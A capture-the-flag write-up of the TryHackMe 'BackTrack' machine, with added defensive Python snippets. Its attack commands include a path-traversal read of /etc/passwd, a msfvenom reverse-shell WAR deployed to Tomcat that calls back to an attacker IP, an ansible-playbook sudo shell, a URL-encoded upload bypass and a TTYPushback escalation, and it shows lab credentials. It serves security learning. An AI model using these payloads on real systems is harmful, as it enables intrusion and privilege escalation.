# BackTrack (THM)

## Enumeration.

### Open ports.

```
PORT     STATE SERVICE         REASON         VERSION
22/tcp   open  ssh             syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 55:41:5a:65:e3:d8:c2:4f:59:a1:68:b6:79:8a:e3:fb (RSA)
| ssh-rsa [RSA host key omitted]
|   256 79:8a:12:64:cc:5c:d2:b7:38:dd:4f:07:76:4f:92:e2 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJfVuy7uiXVmzWVPtY/BYF+RZF36ZR8rh7wxeZi7yeOdWd06henZf8z5rYfalc0YHr6kE3clVa0jq+pF64w/lso=
|   256 ce:e2:28:01:5f:0f:6a:77:df:1e:0a:79:df:9a:54:47 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHMk87a1jTdUzEWZNm/XtZKIto5reBlJr75kFdCKXscp
6800/tcp open  http            syn-ack ttl 63 aria2 downloader JSON-RPC
|_http-title: Site doesn't have a title.
| http-methods:
|_  Supported Methods: OPTIONS
8080/tcp open  http            syn-ack ttl 63 Apache Tomcat 8.5.93
|_http-favicon: Apache Tomcat
| http-methods:
|_  Supported Methods: GET HEAD POST
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat/8.5.93
8888/tcp open  sun-answerbook? syn-ack ttl 63
| fingerprint-strings:
|   GetRequest, HTTPOptions:
|     HTTP/1.1 200 OK
|     Content-Type: text/html
|     Date: Sun, 13 Oct 2024 06:02:10 GMT
|     Connection: close
|     <!doctype html>
|     <html>
|     <!-- {{{ head -->
|     <head>
|     <link rel="icon" href="../favicon.ico" />
|     <meta charset="utf-8">
|     <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <meta name="theme-color" content="#0A8476">
|     <title ng-bind="$root.pageTitle">Aria2 WebUI</title>
|     <link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Lato:400,700">
|     <link href="app.css" rel="stylesheet"><script type="text/javascript" src="vendor.js"></script><script type="text/javascript" src="app.js"></script></head>
|     <!-- }}} -->
|     <body ng-controller="MainCtrl" ng-cloak>
|     <!-- {{{ Icons -->
|_    <svg aria-hidden="true" style="position: absolute; width: 0; height: 0; overflow: hidden;" version="1.1" xm
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
```

#### So we have 22, 6800, 8080 and 8888.

### Enumerate (6800)

After some searching I could not find anything here, so I will enumerate the rest and maybe come back to this one.

### Enumerate (8080)

This port runs Tomcat, and it needs login credentials before you can do anything, so let's move to the last port and see what is there.

### Enumerate (8888)

<figure><img src="/files/3xZkRoQSBkYMvoVguRwp" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/Kol5VTvpNHJgCQmdM5qy" alt=""><figcaption><p>As you can see in the image, there seems to be a path traversal here, as the machine's own image also shows.</p></figcaption></figure>

So let's try some basic path traversal techniques and some fuzzing.\
And indeed it was vulnerable to local file inclusion, because it tries to open the file without any checking of the user input, which is a big no no. :hushed:

<https://gist.github.com/JafarAkhondali/528fe6c548b78f454911fb866b23f66e>\
You can refer to this link for more information and for how the code actually works.

```bash
curl --path-as-is http://backtrack.thm:8888/../../../../../../../../../../../../../../../../../../../../etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
landscape:x:110:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:111:1::/var/cache/pollinate:/bin/false
fwupd-refresh:x:112:116:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
mysql:x:113:122:MySQL Server,,,:/nonexistent:/bin/false
tomcat:x:1002:1002::/opt/tomcat:/bin/false
orville:x:1003:1003::/home/orville:/bin/bash
wilbur:x:1004:1004::/home/wilbur:/bin/bash
```

So as you can see, we are able to exploit it. Let's try to get something useful now.\
After a bit of searching I found the tomcat user's credentials.

<figure><img src="/files/R5VXqzPWn7xqOsIkFtr7" alt=""><figcaption></figcaption></figure>

```
Username: tomcat
password: OPx52k53D8OkTZpx4fr
```
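The service on 8888 opened whatever path the client sent. As an added example (not code from the writeup or from the aria2 WebUI project), here is the check a static file server should have done before opening a file: percent-decode to a fixed point, refuse any `..` component, and confirm the final path still sits under the document root. The document root `/var/www/webui` and the sample requests are constructed for the illustration; the requests include the raw traversal from the curl command above and its single- and double-encoded forms, so the same check also covers the double-encoded `../` that works against the PHP application later in this writeup.

```python
import posixpath
from urllib.parse import unquote

# Assumed document root; any directory would do for the illustration.
WEB_ROOT = "/var/www/webui"


def fully_decode(path: str, max_rounds: int = 5) -> str:
    """Percent-decode until the string stops changing.

    One unquote() turns "%252e" into "%2e"; a second pass turns that into
    ".".  Decoding to a fixed point makes a double-encoded "../" look
    exactly like a plain "../" to the check below.
    """
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            return path
        path = decoded
    raise ValueError("too many layers of percent-encoding")


def resolve_under_root(request_path: str, root: str = WEB_ROOT) -> str:
    """Map a URL path onto a file under root, or raise PermissionError."""
    decoded = fully_decode(request_path)
    if "\x00" in decoded:
        raise PermissionError("NUL byte in path")
    if "\\" in decoded:
        # Some servers treat backslashes as separators; refuse them outright.
        raise PermissionError("backslash in path")
    # Refuse any ".." component before normalising, so an attempt to climb
    # out of the root is rejected (and can be logged) rather than silently
    # clamped to "/".
    if any(part == ".." for part in decoded.split("/")):
        raise PermissionError(f"traversal attempt: {request_path!r}")
    relative = posixpath.normpath("/" + decoded).lstrip("/")
    if relative in ("", "."):
        relative = "index.html"
    candidate = posixpath.normpath(posixpath.join(root, relative))
    # Belt and braces: the final path must still sit inside root.
    if candidate != root and not candidate.startswith(root.rstrip("/") + "/"):
        raise PermissionError(f"escapes document root: {request_path!r}")
    return candidate


def classify(request_path: str) -> tuple:
    """Return (allowed, filesystem path or refusal reason) for one request."""
    try:
        return True, resolve_under_root(request_path)
    except (PermissionError, ValueError) as exc:
        return False, str(exc)


# Constructed requests: the raw traversal from the curl command above, its
# single- and double-encoded forms, and two legitimate paths.
SAMPLE_REQUESTS = [
    "/../../../../../../../../etc/passwd",
    "/%2e%2e/%2e%2e/etc/passwd",
    "/%252e%252e%252f%252e%252e%252fetc%252fpasswd",
    "/app.css",
    "/",
]

if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(f"{req!r:50} -> {classify(req)}")
```

Rejecting `..` before normalisation is deliberate: a server that only normalises would map `/../../etc/passwd` onto `<root>/etc/passwd` and serve a 404, which hides the probe from the logs; refusing it produces an event worth alerting on.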

## Initial Access.

### Reverse Shell.

After I got the creds, I searched for how the manager-script role could be used to exploit the system. I found that this role means I cannot access the GUI management tool, but I can access the endpoints under /manager/text, so all we need to do is create a reverse shell and upload it to the server. You can refer to the following link for a great example.

<https://medium.com/@cyb0rgs/exploiting-apache-tomcat-manager-script-role-974e4307cd00>

To create the reverse shell I used msfvenom:

```
msfvenom -p java/shell_reverse_tcp lhost=10.11.96.110 lport=4444 -f war -o pwn.war
```

To upload it to the server I used curl:

```
curl -v -u tomcat:OPx52k53D8OkTZpx4fr --upload-file pwn.war "http://backtrack.thm:8080/manager/text/deploy?path=/foo&update=true"
```

Finally, start a netcat listener and use curl again to trigger the deployed application:

```
nc -nlvp 4444 # netcat for sure.
curl http://backtrack.thm:8080/foo
```

<figure><img src="/files/XbsJIFwzHAGo5B1BDA8C" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/Q1ZAyv4drs3Aiso5rBvP" alt=""><figcaption><p>We can find the first flag under the directory of tomcat.</p></figcaption></figure>
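The deploy above leaves a clear trail in Tomcat's access log. As an added example (not from the writeup or from the Tomcat project), the following detection runs over constructed log lines in Tomcat's default AccessLogValve format (`%h %l %u %t "%r" %s %b`): it flags successful `/manager/text/deploy` or `undeploy` calls, manager authentication failures, non-loopback access to the manager, and the first request to a freshly deployed context, which is the moment a dropped WAR actually runs. The hosts, timestamps and context names in `SAMPLE_LOG` are made up to mirror the steps above.

```python
import re
from ipaddress import ip_address
from urllib.parse import parse_qs, urlsplit

# Tomcat's default AccessLogValve pattern: %h %l %u %t "%r" %s %b
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+$'
)

# Constructed log lines modelled on the deploy above (not real logs).
SAMPLE_LOG = """\
10.11.96.110 - tomcat [13/Oct/2024:06:05:01 +0000] "PUT /manager/text/deploy?path=/foo&update=true HTTP/1.1" 200 71
10.11.96.110 - - [13/Oct/2024:06:05:09 +0000] "GET /foo HTTP/1.1" 200 0
192.0.2.10 - - [13/Oct/2024:06:06:00 +0000] "GET /index.jsp HTTP/1.1" 200 11156
127.0.0.1 - tomcat [13/Oct/2024:06:07:00 +0000] "GET /manager/text/list HTTP/1.1" 200 120
10.11.96.110 - - [13/Oct/2024:06:08:00 +0000] "PUT /manager/text/deploy?path=/bar HTTP/1.1" 401 2473
""".splitlines()


def parse_line(line: str):
    """Split one access-log line into its fields, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def is_remote(host: str) -> bool:
    """Anything that is not a loopback address counts as remote."""
    try:
        return not ip_address(host).is_loopback
    except ValueError:  # a hostname rather than an address: treat as remote
        return True


def analyze(lines):
    """Return a list of (severity, message) alerts for manager activity."""
    alerts = []
    fresh = {}  # context path -> deploying host, awaiting its first request
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        url = urlsplit(rec["target"])
        path = url.path
        if path.startswith("/manager/"):
            action = path.rsplit("/", 1)[-1]
            if action in ("deploy", "undeploy") and rec["status"] == 200:
                ctx = parse_qs(url.query).get("path", ["?"])[0]
                fresh[ctx] = rec["host"]
                alerts.append(("HIGH", f"{action} of context {ctx} as {rec['user']} from {rec['host']}"))
            elif rec["status"] in (401, 403):
                alerts.append(("MEDIUM", f"manager auth failure from {rec['host']} on {path}"))
            elif is_remote(rec["host"]):
                alerts.append(("LOW", f"manager access from non-loopback {rec['host']} on {path}"))
            continue
        # The first hit on a just-deployed context is when the uploaded code runs.
        for ctx in list(fresh):
            if path == ctx or path.startswith(ctx.rstrip("/") + "/"):
                alerts.append(("HIGH", f"first request to newly deployed {ctx} from {rec['host']}"))
                del fresh[ctx]
    return alerts


if __name__ == "__main__":
    for severity, message in analyze(SAMPLE_LOG):
        print(severity, message)
```

Loopback access to `/manager/text/list` is left unflagged on purpose, since administrators commonly script the text interface from the host itself; what stands out in the sample is a remote deploy followed seconds later by the first request to the new context.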

## Access as Wilbur.

<figure><img src="/files/T07eIGEUQpqSLXywL2VX" alt=""><figcaption></figcaption></figure>

So as you can see, first we have sudo privileges as wilbur on ansible-playbook, which is a tool for managing automated tasks. This one is quite simple, but it actually took me a long time to figure out :cry:.\
<https://gtfobins.github.io/gtfobins/ansible-playbook/>\
Using this source we can work out how to spawn a shell from a task.

```
echo '[{hosts: localhost, tasks: [shell: /bin/sh </dev/tty >/dev/tty 2>/dev/tty]}]' >> /tmp/file.yml

chmod 777 /tmp/file.yml
```

And after that we can simply run the following command:

```
tomcat@Backtrack:/opt/test_playbooks$ sudo -u wilbur ansible-playbook /opt/test_playbooks/../../../../../tmp/file.yml
```

<figure><img src="/files/rbEG6tVbnUbxsv8FGyCs" alt=""><figcaption></figcaption></figure>

And with that we simply get a shell as wilbur.
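The reason the `/opt/test_playbooks/../../../../../tmp/file.yml` argument goes through is that a sudoers rule compares command arguments as text: a wildcard such as `*` in an argument matches any characters, `/` included, and nothing ever looks at where the path actually leads. As an added example (not from the writeup, and the sudoers rule `ansible-playbook /opt/test_playbooks/*.yml` is my assumption about the machine, since the rule itself is only in a screenshot), this compares that lexical glob match with a check that canonicalises the path with `os.path.realpath` first. It builds a throwaway copy of the two directories under a temporary folder so it runs anywhere, and it also covers a case the writeup does not need: a symlink inside the allowed directory that points outside it.

```python
import fnmatch
import os
import tempfile


def sudoers_arg_match(pattern: str, arg: str) -> bool:
    """Lexical glob match, the way a sudoers rule compares an argument.

    Assumption (see lead-in): '*' in a sudoers argument matches any run of
    characters, '/' included, so "../" sequences are never resolved.
    """
    return fnmatch.fnmatchcase(arg, pattern)


def confined_to(allowed_dir: str, arg: str) -> bool:
    """True only if arg, after resolving '..' and symlinks, lies inside allowed_dir."""
    real_dir = os.path.realpath(allowed_dir)
    real_arg = os.path.realpath(arg)
    return real_arg == real_dir or real_arg.startswith(real_dir + os.sep)


def demo() -> dict:
    """Build a throwaway replica of /opt/test_playbooks and /tmp, then run both
    checks on three candidate playbook paths. Returns name -> (glob, realpath)."""
    with tempfile.TemporaryDirectory() as base:
        allowed = os.path.join(base, "opt", "test_playbooks")
        outside = os.path.join(base, "tmp")
        os.makedirs(allowed)
        os.makedirs(outside)
        good = os.path.join(allowed, "site.yml")        # a legitimate playbook
        evil = os.path.join(outside, "file.yml")        # stands in for /tmp/file.yml
        for p in (good, evil):
            open(p, "w").close()
        # Same shape as the path used in the writeup: starts inside the allowed
        # directory, then climbs out with "..".
        traversal = os.path.join(allowed, "..", "..", "tmp", "file.yml")
        # A symlink inside the allowed directory that points outside it.
        link = os.path.join(allowed, "innocent.yml")
        os.symlink(evil, link)
        pattern = os.path.join(allowed, "*.yml")  # assumed sudoers argument glob
        return {
            name: (sudoers_arg_match(pattern, p), confined_to(allowed, p))
            for name, p in (("good", good), ("traversal", traversal), ("symlink", link))
        }


if __name__ == "__main__":
    for name, (glob_ok, real_ok) in demo().items():
        print(f"{name:10} sudoers glob={glob_ok!s:5} realpath check={real_ok}")
```

The glob accepts all three paths; only the canonicalising check limits execution to playbooks that really live under the intended directory. The practical mitigation on the sudo side is to avoid wildcards in arguments altogether and list the specific playbooks, since sudo itself offers no canonicalisation of argument paths.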

## Access as orville

So first we see a message to wilbur from orville.

<figure><img src="/files/rc2sdczaz1jjBWaJ1VnT" alt=""><figcaption></figcaption></figure>

And we also have another note, which contains SSH creds.

<figure><img src="/files/NUznm3l1XJSeK4RlnWfV" alt=""><figcaption></figcaption></figure>

So let's see what orville is talking about.

<figure><img src="/files/PuT1wP0zOiOP7DDZhtEp" alt=""><figcaption></figcaption></figure>

We can see here a well-known HTTP port that we have not seen before, so let's do some port forwarding using SSH.

<figure><img src="/files/T9TIoHWAkBXoOI946X6r" alt=""><figcaption></figcaption></figure>

And now we can access it from port 80 on our machine.

<figure><img src="/files/v0Con4DeyHVfsfvsrrA0" alt=""><figcaption></figcaption></figure>

After logging in we see an upload form, and the project runs PHP, so we may be able to execute PHP on the machine.

<figure><img src="/files/ZdJuMP0ZxE70eTjTA0iG" alt=""><figcaption></figcaption></figure>

We cannot simply upload a PHP file, so there may be some other way to do that.

Oh man, after some time testing I found that we can upload a file named like fileName.png.php, but this will not be executed on the server. Let's check the Apache config to figure out why.

```
wilbur@Backtrack:~$ cat /etc/apache2/apache2.conf
```

<figure><img src="/files/Y8mW0gElrZFhgUK1cBzS" alt=""><figcaption></figcaption></figure>

So that's why. Since we have been doing path traversal all along, I believe we need to do the same here.\
After some testing I found that we can use URL encoding.

<figure><img src="/files/O0CymnPeKJwWkP4dvjab" alt=""><figcaption></figcaption></figure>

When we URL-encode `../` more than once, it works.

<figure><img src="/files/ojKpWgiqQhvqKGRSw8rg" alt=""><figcaption></figcaption></figure>

And by doing so we can see this too.

<figure><img src="/files/FnkLBga3p0TuoBtFXuzz" alt=""><figcaption></figcaption></figure>

And here we have it.

<figure><img src="/files/6RZ81lD6GgHpSscGfXOi" alt=""><figcaption></figcaption></figure>

By the way, this is the payload I used.

<figure><img src="/files/a74ihAflT7W1GtUogH1O" alt=""><figcaption></figcaption></figure>

And now let's just upload our reverse shell.

<figure><img src="/files/CviivYkVIueR1C1ygsE3" alt=""><figcaption></figcaption></figure>

After that, open a Python HTTP server with

```
python3 -m http.server 8000
```

<figure><img src="/files/9rfkB9gedHYp5Y9aq9Hj" alt=""><figcaption></figcaption></figure>

And now we know the file is in the machine.

<figure><img src="/files/3zB6JFOA7bUN3zJVSeia" alt=""><figcaption></figcaption></figure>

Let's change the permissions and execute it. The payload below is `chmod +x exploit.sh`, URL-encoded.

<figure><img src="/files/GtM2oSj9E0MSIr4Vl5xu" alt=""><figcaption></figcaption></figure>

```
%63%68%6d%6f%64%20%2b%78%20%65%78%70%6c%6f%69%74%2e%73%68
```

Now let's run it.

<figure><img src="/files/UtllFVcPPPVbzJkplZd3" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/enDco863cVd4zNyuTcYj" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/UD15ALrALg3jnxuiDVSk" alt=""><figcaption></figcaption></figure>

## Access as Root.

To get a stable shell I generated an SSH key.

<figure><img src="/files/pimXb22rnamAgGIEmdxW" alt=""><figcaption></figcaption></figure>

This will produce the key files orville and orville.pub. Copy the content of orville.pub into /home/orville/.ssh/authorized_keys, copy the content of orville to your machine, change its permissions to 600 and log in with it.

<figure><img src="/files/3HY0Ble1tPuR6CvaQfuu" alt=""><figcaption></figcaption></figure>

### Exploit TTYPushback.

After some searching, I used pspy64 to see what is going on under the hood, and I saw this.

<figure><img src="/files/IoLShSfJxQWSsrb2RUqU" alt=""><figcaption></figcaption></figure>

So basically the root user logs in via SSH and switches user to orville, who then zips some stuff. The problem here is that root does not use the -P flag, which makes su create a new TTY, so we may be able to reach back into the root session and execute commands.

<https://www.errno.fr/TTYPushback.html>\
This is a great write-up of the technique and how to exploit it.

<figure><img src="/files/jCDMH6qFU6TdIJTxIf1K" alt=""><figcaption></figcaption></figure>

So this is the Python code; just change the command to add the s bit (setuid) to bash so we can execute it as root, and put it into .bashrc, which is executed automatically once root switches to the other user.

<figure><img src="/files/UT0HDcnKlbY7UlOKiztC" alt=""><figcaption></figcaption></figure>

And after some time we will see this.

<figure><img src="/files/45QsHkzLco1sUNw2cwQo" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/eP8iBSD5pOEEAvBjgc9v" alt=""><figcaption></figcaption></figure>
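From the defender's side, the condition that makes this work is visible in exactly the kind of process listing pspy showed: a root-owned `su` into a less privileged user without `-P`/`--pty`, so the target user keeps access to root's controlling terminal. As an added example (not from the writeup or from pspy), the following audit parses constructed pspy-style lines, unwraps `sh -c "..."` wrappers, and reports every `su` run as UID 0 that does not request its own pseudo-terminal. The line format, PIDs and commands are made up to mirror what the screenshot above describes. Note that sudo's equivalent control (`Defaults use_pty`) is set in sudoers rather than on the command line, so it cannot be seen from a process listing, and that recent kernels can disable the underlying `TIOCSTI` ioctl through the `dev.tty.legacy_tiocsti` sysctl.

```python
import posixpath
import re
import shlex

# pspy prints lines like "2024/10/13 06:10:02 CMD: UID=0     PID=2015   | su orville"
PSPY_RE = re.compile(r"CMD: UID=(?P<uid>\d+)\s+PID=(?P<pid>\d+)\s+\|\s+(?P<cmd>.*)$")
SHELLS = {"sh", "bash", "dash"}

# Constructed lines modelled on the cron job described above (not real pspy output).
SAMPLE_PSPY = """\
2024/10/13 06:10:01 CMD: UID=0     PID=2011   | sshd: root@pts/0
2024/10/13 06:10:02 CMD: UID=0     PID=2015   | su orville
2024/10/13 06:10:03 CMD: UID=1003  PID=2020   | zip -r /home/orville/backup.zip /home/orville/web
2024/10/13 06:11:00 CMD: UID=0     PID=2030   | /bin/sh -c "su -P orville -c 'zip -r x y'"
2024/10/13 06:12:00 CMD: UID=1004  PID=2040   | su orville
""".splitlines()


def unwrap_shell(argv):
    """If argv is 'sh -c "<cmd>"', return the inner command's argv instead."""
    if argv and posixpath.basename(argv[0]) in SHELLS and "-c" in argv:
        inner = argv[argv.index("-c") + 1]
        return shlex.split(inner)
    return argv


def su_without_pty(cmd: str) -> bool:
    """True when cmd is an su invocation that does not ask for its own pty."""
    try:
        argv = unwrap_shell(shlex.split(cmd))
    except ValueError:  # unbalanced quotes in a truncated line
        return False
    if not argv or posixpath.basename(argv[0]) != "su":
        return False
    return not any(a in ("-P", "--pty") for a in argv[1:])


def audit(lines):
    """Return (pid, command) for every root-run su that keeps the caller's TTY."""
    findings = []
    for line in lines:
        m = PSPY_RE.search(line)
        if not m:
            continue
        if m["uid"] == "0" and su_without_pty(m["cmd"]):
            findings.append((m["pid"], m["cmd"]))
    return findings


if __name__ == "__main__":
    for pid, cmd in audit(SAMPLE_PSPY):
        print(f"PID {pid}: root ran '{cmd}' without -P/--pty")
```

Only PID 2015 is reported: the wrapped `su -P orville` on PID 2030 allocates its own terminal, and PID 2040 is not run as root. The fix on the machine is the one the linked article describes: have root switch user with `su -P` (or `sudo` with `use_pty`), so the less privileged session never shares root's terminal.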

## Ending

In the end, this machine was quite fun and had some new things that I had not seen before :thumbsup:


